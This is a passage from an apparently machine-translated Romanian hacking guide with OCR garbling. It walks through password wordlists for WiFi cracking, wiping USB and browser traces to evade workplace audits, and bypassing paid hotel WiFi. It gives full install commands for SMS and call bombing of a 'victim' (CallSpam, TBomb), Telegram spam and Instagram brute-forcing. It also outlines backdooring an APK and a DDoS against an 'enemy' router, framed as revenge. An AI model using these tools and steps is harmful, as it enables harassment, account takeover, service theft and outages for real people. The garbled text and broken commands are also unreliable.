newrockyou txt): L newrockyou txt Dicționarul rockyou arată cu adevărat impresionant pe fundalul dicționarului BruteX! Dicționare DIRB DIRB (https://kali tools/?p= ) este un scanner de conținut web Acesta caută obiecte web existente (posibil ascunse) În centrul activității sale este o căutare în dicționar, generează cereri către serverul web și analizează răspunsul Cu alte cuvinte, dicționarele DIRB sunt concepute în primul rând pentru a căuta diverse fișiere și foldere de site-uri web și aplicații web, servere web Dicționarele DIRB sunt disponibile pentru toți utilizatorii Kaii Linux și se află în directorul /usr/share/wordiists/dirb Dicționare DirBuster DirBuster (https://kali tools/?p=l ) este o aplicație Java multi-threaded, concepută pentru directorul de forță brută și numele de fișiere ale aplicațiilor web și serverelor web DirBuster încearcă să găsească directoare și fișiere ascunse Pe Kaii Linux, dicționarele se află în directorul /usr/share/wordlists/dirbus-ter/ În BlackArch, dicționarele sunt situate în directorul /usr/share/dirbuster/ Descrierea dicționarelor furnizate cu programul DirBuster • directory-list- -small txt - ( cuvinte) - directoare/fișiere care au fost găsite pe cel puțin trei gazde diferite • directory-list- -medium txt - ( cuvinte) - directoare/fișiere care au fost găsite pe cel puțin două gazde diferite • directory-list- -big txt - ( cuvinte) - toate directoarele/fișierele care au fost găsite • directory-list-lowercase- -small txt - ( cuvinte) - versiunea care nu ține seama de majuscule și minuscule a directory-list- -small txt • directory-list-lowercase- -medium txt - ( cuvinte) - versiunea care nu ține seama de majuscule și minuscule a directory-list- -medium txt • directory-list-lowercase- -big txt - ( de cuvinte) - versiunea care nu ține seama de majuscule și minuscule a directory-list- -big txt g eu J • directory-list-lOtxt - ( cuvinte) - lista originală fără reordonare • apache-user-enum- O txt - ( nume de utilizator) - folosit pentru a ghici numele de utilizator ale Apache pe care modulul userdir este activat, pe baza numelor de utilizator tastate (neordonate) • apache-user-enum- txt - ( nume de utilizator) - folosit pentru a ghici nume de utilizator Apache pe care modulul userdir este activat, pe baza -XXXXX găsit în timpul generării listei (ordonat) Liste de cuvinte de la Metasploit Numele dicționarelor au nume vorbitoare Practic, aceste dicționare sunt destinate conectării de la distanță cu forță brută la diverse servicii, există dicționare universale bune cu nume de utilizator și parole Acestea se află în directorul /usr/share/wordlists/metasploit Dicționare Ncrack Ncrack are liste de cuvinte de calitate pentru servicii de la distanță în formă brută Dicționarul se află în directorul /usr/share/ncrack/ și este împărțit în nume de utilizator și parole Nmap liste de cuvinte Nmap vine cu mai multe liste, inclusiv un dicționar de parole Pe Kaii Linux, toate sunt localizate în folderul /usr/share/nmap/nselib/data/ Dicționare Wfuzz Wfuzz este un alt instrument de forțare brută a aplicației web În folderul /usr/share/wfuzz/wordlist/, puteți găsi diverse colecții, inclusiv cuvinte care pot fi nume sau parole Dicționare de conturi implicite pentru routere Numele de utilizator și parolele din fabrică (standard) sunt foarte frecvente pe routere Router Scan by Stas'M (https://kali tools/?p= ) conține selecții bune pentru digest și autentificare de bază Există, de asemenea, multe site-uri unde puteți găsi parole din fabrică pentru routere De exemplu, puteți utiliza următorul site https://www routerpasswords com/ Și site-ul web Parole implicite (https://open-sez me/index html) facilitează analizarea parolelor implicite pentru diferite dispozitive Dicționare regulate ale diferitelor programe Multe dicționare vin cu diverse instrumente și chiar cu viruși Toate sunt concepute pentru a sparge parole Tabelul conține numele dicționarului și linkul de descărcare Tabelul Dicționare obișnuite Nume Descriere Link John the Ripper Un dicționar foarte bun care vine cu John the Ripper https://kali tools/files/passwords/ password dictionaries/john txt bz Cain & Abel de de ori mai mare decât precedentul, dar necomandat Trebuie să utilizați pw-inspector pentru a analiza acest fișier https://kali tools/files/passwords/ password dictionaries/cain txt bz Conficker Utilizat de viermele Conficker https://kali tools/files/passwords/passworddictionaries/conficker txt bz Ton de cele mai proaste parole Numele spune totul https://kali tools/files/passwords/ password dictionaries/ -worst-passwords txt bz Parole populare > caractere Conține de parole Folosit ca cuvinte stop de platforma Discourse https://kali tools/files/passwords/ passworddictionaries/ -char-common-passwords txt Credem că dicționarele date vor fi destul de suficiente Dacă nu vă este suficient, puteți vizita următoarea pagină, unde veți găsi dicționare suplimentare: https://wiki securitatea craniului org/parole Puteți utiliza următoarele programe pentru a vă crea propriile dicționare: • Hashcat • crunch • statsprocessor • mascaprocesor realități Pe de o parte, s-a arătat cât de ușor este să spargi o parolă dintr-o rețea WiFi Pe de altă parte, există multe nuanțe Prima este cunoștințele și timpul necesar Nu orice persoană va implementa o mașină virtuală împreună cu Linux pentru a pirata WiFi Desigur, dacă intenționați să faceți mai mult decât asta, atunci ați instalat o mașină virtuală cu Kali Linux înapoi în Capitolul Dar de dragul de a sparge WiFi-ul vecinului, deranjați Nici măcar nu știm În plus, perspectivele de hacking în sine sunt foarte vagi fără un fișier bun cu parole De unde să-l iei? Deja știi Pe lângă sursele menționate, există site-uri întregi cu generatoare de liste de parole, sunt site-uri care postează primele parole De exemplu, în , parolele de top arată ca cele prezentate în Fig Te așteptai la parole mai complexe? • O > ■D KD t Desfaceți-vă- NordPass Crăciun discpunt ut ■ f, " " fpG^emmI HowllWorfa feenxei Ptnt Appa Blog (banda Kom Hdp Numbe Ei ei " Tipe a crack ii Pmpi * im • l • DO & •LAL" 'Km rw • powwad ,IM U * "TMMTI în"" l • mm ѵ ig " * oyf •juhw PUW Le(r) ipal * moto ?M fM LA SHLI TONMI " ," P Orez Cele mai bune parole în Sursa https://nordpass com/most-common-passwords-list/ Cum să te protejezi de hacking-ul WiFi? Da, utilizați doar o parolă care nu este un cuvânt din dicționar, are caractere (sau mai mult), conține litere/cifre și câteva caractere speciale precum #,?,! Exemplu: Adh !#@YuI $$ Este puțin probabil ca cineva să spargă această parolă folosind o listă de parole Există, desigur, generatoare de secvențe de caractere, dar Căutarea unei parole de caractere caracter cu caracter va dura o veșnicie Până când îl descifrați, s-ar putea să se fi întâmplat trei lucruri: Routerul victimei se va defecta Victima va schimba parola dintr-un motiv sau altul Vei îmbătrâni Încă o dată: este posibil să piratați WiFi, dar perspectivele sunt foarte vagi Dar cu puțin noroc, orice este posibil Capitolul Ne acoperim urmele Acest capitol va discuta despre cum să vă ascundeți urmele atunci când lucrați în Windows Articolul nu este deloc know-how, aproape tot ce este descris în el vă este familiar Priviți-o ca pe un fel de listă de TODO - pentru a nu uita nimic atunci când vă curățați computerul înainte de tot felul de verificări Această listă este utilă dacă ai lucrat pe computerul altcuiva sau când ai transferat un computer, de exemplu, când l-ai vândut sau pur și simplu l-ai transferat unui alt coleg Ștergerea listelor de locuri și programe recente Ambele sisteme de operare - șapte și zece - vă urmăresc cu perfidă și sunt gata să vă ofere toate informațiile necesare la cerere Ne vom da seama cum să curățăm aceste informații Să începem cu liste cu locuri și programe recente Lista de programe recente (în primele zece - utilizate frecvent) este stocată în meniul principal (Fig ), iar lista cu locurile recente - în explorator (Fig ) Orez Lista de programe utilizate frecvent în IHndows Puteți dezactiva lista de aplicații adăugate recent și utilizate frecvent din fereastra Opțiuni Deschideți-l și accesați Personalizare, Start Opriți tot ce este acolo (Fig ) • Mutare" X Îmbunătățire - V Copiați "-U Redenumire" ** f #• " Bara de instrumente Acces rapid > la Ch g ,F S' Gadljt* •"P*U CcWb - și Acest koylyotar > În ora : > g[ Documente ■ cu in* ѵ Dosare utilizate frecvent ( ) Documentație Eu acest computer Fișiere recente ( ) I ToUi Comandant * J Yuiykl L Configurație r*' > "L Configurație V; > іЗ Administrema І I ■v configuraţie Poly I > L Configurație rț I > d Configurație V I ѵ ă Administrație"; > Щ Componente! I > Meniul Start Folder partajat > Panoul Utir" > Lucru * > a Rețeaua > (Sistemul Y SJs Toate cuplurile*G| Editați politica paoametd Orez Politica de grup Extins^ Standard [G J Ștergeți lista băncilor de software din meniul de pornire Nu eadane Curățarea locurilor recente din primele zece este mai ușor Deschideți File Explorer, accesați fila Vizualizare, faceți clic pe butonul Opțiuni În fereastra care apare, dezactivați opțiunile Afișare fișiere utilizate recent în Bara de instrumente Acces rapid și Afișare foldere utilizate frecvent în Bara de instrumente Acces rapid Apăsați și butonul Clear (fig fig ) Opțiuni pentru folderul X General iv Pokzh dkOpf ^ at, o evidențiază o * mm ivpvmom Restabiliți valorile implicite Orez Opțiuni pentru foldere Windows G După cum puteți vedea, o sarcină atât de simplă precum ștergerea ultimelor obiecte are o soluție destul de dificilă - la urma urmei, trebuie să utilizați editarea politicii de grup Ștergerea listei de unități USB În unele facilități securizate, numai unitățile flash (unități) înregistrate în jurnal pot fi conectate la computer Și, ca de obicei, revista este cea mai comună - hârtie Adică, computerul în sine nu restricționează în niciun fel conexiunea unităților neînregistrate Nu limitează, ci înregistrează Dacă verificarea arată că utilizatorul a conectat unități neînregistrate, va avea probleme Să ne dăm seama cum să ajutăm utilizatorul Aruncă o privire la cheile de registry: [HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ [HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Enum\USB\ Iată-le (Fig ) - toate unitățile pe care le-ați conectat la dvs Orez Cheie de registry HKEYLOCALMACHINE\SYSTEM\CurrentControlSet\ EnumWSBSTOR S-ar părea că totul trebuie curățat aici Dar nu este atât de simplu În primul rând, permisiunile pentru aceste ramuri de registru sunt setate în așa fel încât să nu ștergeți nimic chiar și în "șapte", ca să nu mai vorbim de primele zece În al doilea rând, atribuirea manuală a drepturilor și a permisiunilor durează destul de mult timp, mai ales dacă există o mulțime de unități În al treilea rând, drepturile de administrator nu vor ajuta În al patrulea rând, pe lângă aceste două secțiuni, trebuie să curățați și următoarele: • HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints \CPC\Volume • HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints \ • HKEY LOCAL MACHINE\SYSTEM\ControlSet \Control\Class\ { FC E -C - CF- - } • HKEY LOC AL M ACHINE\S YSTEM\ControlSetOO \Control\Class\ { D E -E - CE-BFC - BE } • HKEY LOCAL MACHINE\SYSTEM\ControlSetOO \Control\ DeviceClasses\{ f -b bf-lld - f - a c efb b) • HKEYLOC AL MACHINE\SYSTEM\ControlSetOO \Control\ DeviceClasses\ { f Oa-b bf- d - f - a c efb b} • HKEY LOCAL MACHINE\SYSTEM\ControlSetOO \Control\ DeviceClasses\ { f Od-b bf- d - f - a c efb b • HKEYLOC AL MACHINE\S YSTEM\ControlSetOO \Control\ DeviceClasses\ { - AFE- D -AE C- A CC D C} • HKEYLOC AL M ACHINE\S YSTEM\ControlSetOO \Control\ DeviceClasses\{a dcbfl - -lld - f- c fb ed} • HKEYLOC AL M ACHINE\S YSTEM\ControlSetOO \Enum\STORAGE\ RemovableMedia • HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\{ abf f d- c - a- a - e e af } • KEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\{ f -b bf-lld - f - a c efb b} • KEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\ DeviceClasses\ { f a-b bf- d - f - a c efb b} • HKEY LOCAL MACHINE\SYSTEM\MountedDevices Aceste secțiuni nu trebuie doar șterse, ci trebuie curățate corespunzător Să spunem că dacă ai aflat azi că mâine este un control, va trebui să stai noaptea Sau folosiți un program special Pe unele forumuri în care această problemă este rezolvată, se recomandă programul USBDeview Totuși, l-am testat și declar că nu curăță informațiile din toate secțiunile Secțiunile USBSTOR și USB conțin în continuare informații despre mediile conectate Și acestea sunt primele secții unde se vor uita inspectorii Pot recomanda USB Oblivion (http://www cherubicsoft com/en/projects/usboblivion) Rulați-l, activați parametrul Do real clean (simulation otherwise) (puteți activa sau dezactiva parametrul Save backup reg-file, dar dacă scopul nu este să verificați programul, ci să verificați efectiv la locul de muncă, atunci este mai bine să dezactivați-l) și faceți clic pe butonul Curățare Orez Programul USB Oblivion Programul nu numai că curăță, dar afișează și un jurnal detaliat al acțiunilor sale (Fig ) La sfârșitul activității sale, nu se va menționa conectarea vreunei unități la computer Pentru a nu fi suspicios, trebuie să conectați un operator înregistrat (permis) la acesta - astfel încât să existe cel puțin un operator Orez USBOblivion în acțiune Ștergeți memoria cache și istoricul browserului Al treilea element din TODO este ștergerea memoriei cache și a istoricului browserului Ei bine, dacă utilizați un singur browser, dacă nu, va trebui să curățați totul: " ] • Edge - puteți șterge lista fișierelor descărcate și toate jurnalele folosind combinația de taste Ctrl + Shift + Del Doar faceți clic pe linkurile relevante Când ștergeți jurnalul, bifați toate casetele de selectare și faceți clic pe butonul Ștergere • Firefox - deschideți setările, accesați secțiunea Confidențialitate și securitate, faceți clic pe butonul Ștergere date, selectați toate butoanele radio, faceți clic pe butonul Ștergere • Chrome - apăsați Ctrl + Shift + Del, pe pagina care apare, selectați cleaning for all time, bifați toate casetele de selectare și faceți clic pe butonul Delete data • Opera - folosim aceeași combinație: apăsați Ctrl + Shift + Del, pe pagina care apare, selectați cleaning for all time, bifați toate casetele și faceți clic pe butonul Delete data • IE - cine îl folosește? Recomandările pot fi găsite pe site-ul Microsoft Orez Opera Browser Cleanup Ca rezultat, nu numai că veți șterge urmele, dar veți economisi și spațiu pe disc Și pentru a nu fi nevoit să curățați jurnalele browserului de pe computerul de serviciu, vizitați toate site-urile personale în modul incognito Desigur, administratorul va vedea jurnalul pe gateway dacă dorește, dar totul va fi curat pe computerul tău Soluția optimă este utilizarea Tor În acest caz, nici măcar administratorul nu va vedea ce site-uri vizitați (cu condiția să nu existe o cameră de supraveghere în spatele vostru) [ Eliminarea înregistrărilor DNS Puteți afla ce site-uri ați vizitat nu numai din istoricul browserului, ci și din memoria cache DNS Când introduceți adresa unui site web într-un browser, computerul caută DNS pentru a rezolva numele site-ului web într-o adresă IP Cache-ul numelor rezolvate anterior este stocat pe computer Îl puteți vizualiza cu comanda ipconfig /displaydns Nu voi da o concluzie, este prea lung O altă comandă pentru a goli acest cache este ipconfig /flushdns Ștergerea cookie-urilor Flash Toți cei care nu sunt leneși te urmăresc Chiar și flash player-ul ține evidența vizitelor dvs Cookie-urile Flash sunt colectate în directorul %appdata%\Macromedia\ Flash Player\#SharedObjects Ce să faci cu el, ai ghicit deja: cd %appdata%\Macromedia\Flash Player\#SharedObjects echo I del * * În general, comanda del poate fi introdusă cu un asterisc (*), dar îmi place cumva mai bine cu două (* *) Eliminarea listei de documente MS Office recente Pentru comoditatea utilizatorilor, o listă de documente recente este stocată de toate programele suitei de birou În noile versiuni ale Oftice, trebuie să mergeți la secțiunea "Avansat" din parametri, să setați numărul de documente recente = Orez Opțiuni MS Word (rețineți că în Figura există doi parametri care trebuie setați la ) Programul nu vă permite să setați valoarea , așa că o setăm la și apoi deschidem un fișier inofensiv Automatizați curățarea cu CCIEapeg Rețineți că avem nevoie de CCieapeg Desktop, nu de CCieapeg Cloud Acesta din urmă costă bani, iar funcționalitatea sa este mult mai largă decât avem nevoie Accesați http://ww^ piriform com/ccleaner și selectați versiunea gratuită Ceea ce îmi place la CCIEPER este că: • Acceptă cele mai recente Windows, cele mai recente browsere, inclusiv Edge (spre deosebire de Free History Eraser) Poate curăța nu numai sistemul, ci și aplicațiile (Fig ) Programul poate funcționa în modul batch și apoi se va arăta cum să apelați procesul de "curățare" dintr-un fișier batch Orez Curățare sistem (CCIEapeg) Utilizarea este simplă - selectați elementele pe care doriți să le ștergeți și apăsați butonul Clear Ștergere reală a fișierului Știm cu toții că ștergerea unui fișier nu îl șterge de fapt Doar înregistrarea despre aceasta este ștearsă, iar datele în sine continuă să existe undeva pe disc Prin urmare, pentru a șterge complet informațiile, trebuie să utilizați utilități speciale de ștergere care suprascriu spațiul liber pe disc cu date aleatorii După aceasta, nu veți mai putea restaura fișierele În acest articol, am șters deja o mulțime de lucruri, așa că este timpul să ștergem spațiul liber, astfel încât nimic să nu poată fi restaurat -OH Orez Curățare aplicație (CCIEapeg) Există multe utilitare pentru suprascrierea informațiilor Dar vom folosi ceea ce avem deja, și anume CCIEAPER Accesați Service, Ștergeți discurile, selectați discul pe care doriți să îl ștergeți, ce să ștergeți - Numai spațiu liber și metoda de ștergere Aplicația acceptă mai multe standarde de ștergere - de la cel mai simplu, care presupune o suprascriere, până la metoda Gutmann ( de treceri) Notă Despre ștergerea informațiilor vom vorbi în detaliu în capitolul următor Orez Ștergeți spațiul liber eu J CCleaner este departe de a fi singurul program Există multe astfel de programe De exemplu, BCWipe, ale cărui funcții le puteți găsi la http://www jetico com/wiping/ -accordion-m- / -acc-ru- - Nu numai că poate șterge spațiul liber, dar poate șterge și fișierul swap, care poate conține și informații sensibile Dezavantajul său este că este plătit, dar pentru o ștergere unică (de exemplu, înainte de verificare), este potrivită și o versiune de probă - este gratuită Creați un fișier bat pentru a curăța totul Acum să încercăm să automatizăm unele dintre operațiunile descrise mai devreme Să începem prin a șterge fișierele din directorul Recent Este posibil să ștergeți cu comanda del, așa cum se arată mai sus, dar este mai bine să utilizați CCleaner imediat pentru eliminarea în siguranță: XCSIeapeg exe /delete "%appdata%\Microsoft\Windows\ RecentX*" XCSIeapeg exe /delete %appdata%\microsoftXwindowsX recentXautomaticdestinationsX*" XnyTb\CCleaner exe /delete "%appdata%\Macromedia\Flash Player\#SharedObjects" Din păcate, CCleaner nu poate fi apelat în așa fel încât să curețe tot spațiul liber în modul linie de comandă, așa că va trebui să ștergeți fișierele prin intermediul acestuia, și nu cu comanda del, sau să utilizați comanda del și apoi să o lansați manual și apelați la curățarea spațiului liber Ultimul parametru ( ) înseamnă îndepărtarea cu trei treceri Acesta este modul optim, deoarece o trecere ( ) este prea ușoară, iar toate celelalte sunt prea lungi Opțiunile pentru linia de comandă CCleaner pot fi găsite la http://myccleaner net/ccleaner-ndash-paramettyi-komandnoy-stroki/ Dar în modul de comandă, puteți elimina unitățile USB: XnyTbXUSBOblivion exe -enable -auto -nosave -silent Primul parametru începe curățarea efectivă, nu simularea Al doilea este să lucrezi în modul silențios (nu trebuie să apeși un buton), fișierele reg nu vor fi salvate (-nosave), iar opțiunea -silent înseamnă să lucrezi în modul silențios - tocmai potrivit pentru linia de comandă Apoi, trebuie să rulați CCIEapeg cu opțiunea /AUTO pentru curățarea automată în mod implicit, dar aceasta nu șterge memoria cache DNS, așa că va trebui să fie șters manual: nyTb\CCleaner exe /AUTO ipconfig /flushdns De fapt, avem următorul scenariu: \nyTb\CCleaner exe /delete "%appdata%\Microsoft\Windows\ RecentV" \nyTb\CCleaner exe /delete %appdata%\microsoft\windows\recent\ automaticdestinationsX*" \nyTb\CCleaner exe /delete "%appdata%\Macromedia\Flash Player\#SharedObjects" \nyTb\USBOblivion exe -enable -auto -nosave -silent nyTb\CCleaner exe /AUTO ipconfig /flushdns Creați un script AutoHotkey pentru a curăța totul Acum să scriem un scenariu puțin diferit Acesta va lansa browserul Chrome în modul incognito, după sesiunea dvs în Chrome (WinWaitClose va fi setat) vom rula CCIeapeg pentru a șterge automat (cache-ul browserului și fișierele temporare vor fi șterse), iar după aceea vom șterge cache-ul DNS Scriptul va arăta astfel: Run, C:\path\to\chrome exe -incognito WinWait - Google Chrome WinWaitClose Runr C:\nyTb\ccleaner exe /AUTO Runr cmd /s "ipconfig /flushdns" Sesiunea de navigare MsgBoXf este curățată Dacă utilizați Firefox, modificați prima linie pentru a indica calea către Firefox, dar trebuie să specificați -private ca parametru Pentru a rula acest script, veți avea nevoie de AutoHotKey https://autohotkey fagure/ eu J Capitolul Cuțitul de hacker elvețian Toată lumea știe ce este un cuțit elvețian și care este farmecul lui Trebuie să tăiați ceva - vă rog, trebuie să deschideți conservele - nicio problemă, aveți nevoie de foarfece - fără întrebări Acest capitol este un fel de cuțit elvețian al hackerului Conține diverse instrumente pentru toate ocaziile Chiar dacă acest instrument sau acela nu vă este util acum, mai devreme sau mai târziu veți reveni la acest capitol Puteți găsi cu ușurință toate programele discutate în acest capitol pe Internet Cum să recuperați parola Total Commander În anii și , când computerele au început să apară la utilizatorii obișnuiți (deși nu la cei mai obișnuiți), și nu în unele institute de cercetare, principalul sistem de operare a fost DOS Tinerii cititori ai acestei cărți nu au văzut-o niciodată și probabil o vor vedea doar într-o fotografie, deoarece nu a suportat capturi de ecran DOS era vizual similar cu UNIX/Linux fără o interfață grafică - doar linia de comandă și atât Desigur, din punct de vedere tehnic, DOS a rămas cu mult în urma UNIX - a fost cu un singur utilizator și cu o singură activitate, în timp ce UNIX a fost multi-utilizator și multi-tasking încă de la naștere Dar acum nu este vorba despre asta Pe vremea DOS și a shell-ului Windows , existau manageri de fișiere populari cu două panouri precum Norton Commander, Volkov Commander, DOS Navigator etc Astfel de manageri se asemănau vizual unul cu celălalt Ecranul a fost împărțit în două panouri - stânga și dreapta Fiecare dintre panouri afișa conținutul unui director sau putea afișa conținutul unui fișier text selectat în al doilea panou Managerii de fișiere cu două panouri au devenit atât de înrădăcinați în mintea utilizatorilor încât au trecut ani, dar nu și-au pierdut relevanța Desigur, au devenit diferite - sunt deja aplicații Windows cu drepturi depline, cu funcționalități la care nu se putea visa decât în zilele DOS, cu suport pentru plug-in-uri etc Un astfel de manager este Total Commander Popularul manager de fișiere Total Commander stochează parolele pentru serverele FTP în fișierul de configurare WCX FTP INI, care este stocat în același director ca și Total Commander însuși Cum să recuperezi o parolă uitată? Acest lucru se poate face folosind programul wcftpcrack Folosirea ei este foarte simplă: În orice editor de text, deschideți fișierul WCX FTP INI Copiați parola criptată pe serverul FTP și inserați-o în program mu wcftpcrack Faceți clic pe butonul Afișare și obțineți parola decriptată Orez Decriptarea parolei Total Commander Trimitere gratuită de SMS-uri în întreaga lume Uneori trebuie să trimiteți SMS-uri gratuit și anonim (fiecare are obiective diferite) Pentru a face acest lucru, puteți utiliza serviciul https://freebulksmsonline com/, care trimite SMS-uri gratuit Trebuie doar să introduceți numărul destinatarului și textul mesajului (limitat la de caractere) Trimiteți SMS în întreaga lume și copiați valoarea numerică - acesta este GoogleID Introduceți-l în loc de în linkul https://www google com/maps/ contrib/ și urmați-l Dacă o persoană a lăsat vreodată o recenzie, veți vedea unde și când a fost și ce a scris Ocoliți autorizarea Wi-Fi cu acces pentru oaspeți Întrerupem Wi-Fi plătit în hotel Nu este neobișnuit să găsești routere cu "acces pentru oaspeți", dar se întâmplă ca Wi-Fi-ul gratuit să aibă protecție Captive Portal Cu alte cuvinte, există o rețea Wi-Fi deschisă la care ne putem conecta fără a folosi o parolă, dar de fiecare dată când încercăm să accesăm resursa de Internet, vom fi redirecționați către o pagină în care va trebui să introducem acreditările, să plătim, confirmați numărul de telefon folosind SMS-uri sau ceva Desigur, nu doriți să lăsați numărul dvs de telefon, darămite să plătiți pentru accesul la Internet Prin urmare, vom folosi un utilitar care va ocoli această protecție Trebuie să mergeți la terminal și să scrieți comenzile pentru instalare: sudo sudo apt -y install sipcalc nmap wget https://raw githubusercontent com/systematicat/ hack-captive-portals/master/hack-captive sh sudo chmod u+x hack-captive sh sudo /hackcaptive sh Utilizare: sudo /hackcaptive sh După fraza "Pwned! Acum poți naviga pe internet!" poți folosi internetul gratuit J Site pentru schimbător de voce Site-ul https://voicechanger io/ nu este un instrument foarte serios, dar este destul de simplu și funcțional Și totuși este gratuit Pentru tot felul de glume cu prietenii tăi, capacitățile sale sunt mai mult decât suficiente Este posibil să descărcați audio/textul finalizat sau să înregistrați totul online Un bonus sunt câteva zeci de setări prestabilite gata făcute, precum și posibilitatea de a crea propriile dvs Puteți utiliza cu ușurință acest instrument dacă trebuie să lăsați un mesaj anonim pe Internet, astfel încât să nu puteți fi identificat de voce Principalul lucru este să rămâneți anonim atunci când lucrați cu site-ul în sine - nu trebuie să îl accesați de la adresa IP Trimiteți spam unui prieten în Telegram folosind Warm Înainte de a putea instala și utiliza scriptul de mai jos, trebuie să obținem un "ID API personalizat și hash" Nu uitați că aceste date nu trebuie niciodată afișate sau partajate cu alții! Puteți obține aceste date pe site-ul my telegram oig (accesați "Instrumente de dezvoltare", apoi completați primele două câmpuri și faceți clic pe Salvare) Gata, avem un hash și un identificator Rămâne doar să ne dăm seama cum să le folosești Instalați pachetele necesare (pe Debian/Ubuntu/Kali, utilizați apt în loc de sudo apt): sudo sudo apt update && sudo apt upgrade sudo sudo apt instail git python sudo pip instail telethon pyotp git clone https://github com/SeRgEy /TG-spam cd TG-spam Lansăm: python spamtg py După lansare, completăm câmpurile: Introduceți hash-ul dvs Introduceți identificatorul nostru (ip aplicație) individual Algoritmul este: Când ne-am uitat la instrumentele Kaii Linux, a existat un Borki" din fișierul APK Descărcați un fișier APK, extrageți-l cu Apktool Adăugați un virus la ARC Creați un nou APK Criptați-l cu instrumentul avpass Ne răzbunăm pe inamic cu CallSpam Dacă cineva te-a enervat, poți să te răzbuni pe el, și chiar nu cu propriile mâini CallSpam vă va ajuta cu asta - un mic script, a cărui esență este foarte simplă - ia numărul de care aveți nevoie și îl plasează în toate serviciile care vor apela și vor oferi serviciile lor Lista de comenzi pentru a instala CallSpam pe orice distribuție Debian: apt update && apt upgrade -y apt instail python git -y solicitări de instalare pip pip instala transliterate pip instail colorama git clone https://github com/kitasS/callspam cd callspam python SpamCall py Notă Teoretic, nici nu ai nevoie de Linux, poți instala aplicația Termux Adnroid și poți introduce toate aceste comenzi chiar de pe smartphone În acest caz, utilizați comanda pkg în loc de apt Sintaxa va fi aceeași doar înlocuiți apt cu pkg Deci primele două comenzi vă pregătesc sistemul Primul actualizează pachetele/sistemul, al doilea instalează Python și Git Dacă ați instalat aceste aplicații înainte, nu puteți introduce deloc primele două comenzi Comenzile - instalează modulele necesare pentru script-ul Python Apoi, apelăm Git pentru a clona depozitul de callspam de pe computerul local, mergem la folderul callspam și rulăm scriptul SpamCall py Rețineți că numele scriptului și al depozitului sunt diferite Apoi, trebuie să introduceți un număr de telefon și un nume Dacă numele nu este specificat, la apelare vor fi indicate nume aleatorii Apoi vedem din ce servicii îl vor chema Un alt spammer bombă TBomb Dacă CallSpam nu a fost suficient pentru tine, TBomb este un nou instrument care îți va enerva victima nu numai cu mesajele spam prin SMS, ci și cu apeluri la ora dimineața de genul "ai fost aprobat pentru un împrumut" Singurul dezavantaj al acestui bombardier este că apelurile nu funcționează în toate regiunile și nu cu toți operatorii, dar merită încercat Primele două comenzi, ca în cazul precedent (dacă nu le-ați introdus încă): apt update && apt upgrade -y apt instail python git Clonează depozitul: git clone https://github com/TheSpeedX/TBomb cd TBomb Instalați toate dependențele (module Python): python -m pip install -r requirements txt bash TBomb sh Când porniți pentru prima dată TBomb va instala toate pachetele necesare (Fig ), așteptați finalizarea procesului până când vedeți linia Cerințe în stagnat (pHC , ) Orez Prima lansare a TBomb Orez Instalarea software-ului suplimentar a fost finalizată În continuare, veți vedea meniul principal al bombardierului (Fig ) Selectați modul spam: SMS Apeluri E-mail Puc, , Meniul principal al bombardierului Alegeți sau Apoi trebuie să introduceți codul țării (fără +) și numărul de telefon al victimei Apoi, apăsați Enter de ori, introduceți " " sau " " pentru a selecta modul de spam, introduceți codul de țară al victimei (de exemplu, " " fără +) și apoi numărul de telefon însuși Apoi introduceți următoarele informații: • Numărul de mesaje/apeluri Maximul este , dar dacă introduceți , numărul va fi nelimitat • Întârziere între SMS/apel • Numărul de fire Orez Opțiuni de bombardier Apoi veți vedea parametrii bombardierului și un mesaj că bombardamentul poate fi întrerupt în orice moment apăsând Ctrl + Z și continuați apăsând Enter Apăsați Enter acum pentru a începe procesul Pe fig arată că am selectat fluxuri, de secunde între SMS/apel, de mesaje De fapt, asta-i tot Ne bucurăm de proces și vedem câte SMS-uri au fost trimise (Fig arată ce a fost trimis Orez procesul de bombardare Hack Instagram Cu scriptul Instahack, puteți forța brută un cont Instagram Înainte de a începe contul de forță brută, nu uitați să anonimizați Torifică traficul sau conectează-te la un VPN Pentru a instala Instahack, urmați acești pași: Actualizați pachetele ca de obicei sudo apt update -y sudo apt upgrade -y Avem nevoie și de Python și Git sudo apt instail python -y sudo apt instail python -y sudo apt instail git -y Instalați dependențe: pip instala lolcat [ Descărcați instahack și deschideți directorul cu acesta: git clone https://github com/evildevill/instahack cd instahack Rulați programul de instalare și instalați-l: configurarea bash bash instahack sh Atacul DDOS la router Dacă doriți, puteți "descărca" routerul inamicului, ceea ce îl va lăsa fără internet pentru o perioadă Având în vedere că toată lumea folosește în principal cutii ieftine pentru o medie de - de ruble, routerul nu va rezista unui astfel de atac Este o veste bună Vestea proastă este că trebuie să aflați cumva adresa IP a inamicului Poate fi necesar să-l atragi pe site-ul tău și să te uiți la jurnalele sau să scrii un script simplu care să-ți trimită adresa IP a fiecărui utilizator care îl vizitează În PHP, un astfel de script ar arăta astfel: Rămâne doar să atragi victima la acest script și vei obține adresa ei IP Apoi procedați astfel: nmap -T -ѵ adresa IP git clone https://github com/Hydra /Planetwork-DDOS În timp ce nmap scanează victima pentru porturi deschise, deschideți un al doilea terminal și introduceți a doua comandă - aceasta va instala scriptul pentru atacul DDOS Când apar casetele de dialog Doriți să continuați? Y / n "apăsați Y Lansați: cd Planetwork-DDOS python phtddos py adresa IP open port no packets Exemplu: python phtddos py eu J În mod similar, puteți "pune" un site, și nu doar routerul inamicului Site-ul este atât mai ușor, cât și mai dificil în același timp Este mai ușor, deoarece nu trebuie să atragi victima către scriptul tău - adresa IP a site-ului este ușor de calculat și, în general, îi poți specifica numele de domeniu imediat, fără a specifica adresa IP Mai dificil este că site-ul poate funcționa printr-un anti-DDOS-cepBHc precum CloudFlare și nimic nu va funcționa pentru tine Atacul va fi întrerupt, iar șantierul va continua să funcționeze Sploitus - motor de căutare pentru vulnerabilități noi Metasploit, discutat mai devreme în această carte, nu este un panaceu și departe de a fi singurul instrument pentru găsirea vulnerabilităților Iar vulnerabilitățile din el nu sunt cele mai noi Acest lucru se datorează faptului că, în cazul Metasploit, procesul de adăugare a unei vulnerabilități arată astfel: Apariția unei vulnerabilități - când a fost descoperită prima dată de un hacker După ceva timp, vulnerabilitatea devine publică - toată 